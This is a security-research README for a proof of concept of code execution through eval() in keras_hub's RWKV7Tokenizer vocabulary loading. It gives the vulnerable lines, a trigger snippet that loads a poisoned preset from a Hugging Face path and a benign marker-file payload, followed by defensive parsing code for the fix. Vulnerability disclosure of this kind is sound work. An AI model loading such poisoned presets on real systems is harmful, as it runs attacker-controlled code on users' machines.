RWKV7 Tokenizer eval() RCE - Proof of Concept
⚠️ SECURITY RESEARCH - DO NOT USE IN PRODUCTION ⚠️
This repository demonstrates CVE-pending arbitrary code execution via
eval() in keras_hub.models.RWKV7Tokenizer vocabulary loading.
Vulnerability
keras_hub/src/models/rwkv7/rwkv7_tokenizer.py lines 117 and 275
call eval() on each line of vocabulary.txt during preset loading.
The vocabulary file in this repo contains a payload that executes
touch /tmp/keras_hub_rwkv7_pwned to prove code execution.
Trigger
```python
import keras_hub
tokenizer = keras_hub.models.RWKV7Tokenizer.from_preset(
    "hf://d3banjan/rwkv7-tokenizer-eval-rce-poc"
)
# Check: ls -la /tmp/keras_hub_rwkv7_pwned
```
Fix
Replace eval() with ast.literal_eval() at lines 117 and 275.
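The literal-only parsing this fix calls for, as an added example that is not keras_hub's own code. The line layout `<id> <literal> <byte length>`, the function names, the length cap and the sample lines are assumptions constructed for illustration.

```python
import ast

MAX_LINE_LEN = 4096  # assumed cap; bounds parser work on hostile input

def parse_vocab_line(line):
    """Parse one '<id> <literal> <byte length>' line without executing it."""
    line = line.rstrip("\r\n")
    if len(line) > MAX_LINE_LEN:
        raise ValueError("vocabulary line too long")
    first, last = line.index(" "), line.rindex(" ")  # ValueError if no space
    token_id = int(line[:first])
    try:
        # Only literals (str, bytes, numbers, containers) are accepted;
        # calls, names and attribute access are rejected, never evaluated.
        token = ast.literal_eval(line[first:last].strip())
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        raise ValueError(f"token {token_id}: not a plain literal") from exc
    if isinstance(token, str):
        token = token.encode("utf-8")
    if not isinstance(token, bytes):
        raise ValueError(f"token {token_id}: expected str or bytes")
    if len(token) != int(line[last:]):
        raise ValueError(f"token {token_id}: declared length mismatch")
    return token_id, token

def load_vocab(lines):
    """Build {id: token bytes}; any bad line aborts the whole load."""
    vocab = {}
    for line in lines:
        if line.strip():
            token_id, token = parse_vocab_line(line)
            vocab[token_id] = token
    return vocab

# Constructed sample lines (not taken from any real vocabulary file).
GOOD_LINES = ["1 '\\x00' 1", "2 'a b' 3", "3 b'\\xe4\\xb8' 2"]
BAD_LINES = ["4 str(1) 1", "5 'abc' 2", "6 ['a'] 1", "7"]

if __name__ == "__main__":
    print(load_vocab(GOOD_LINES))
    for bad in BAD_LINES:
        try:
            parse_vocab_line(bad)
        except ValueError as err:
            print("rejected:", err)
```

Failing the whole load on the first non-literal line means a tampered vocabulary file surfaces as an error at preset loading instead of being partially accepted.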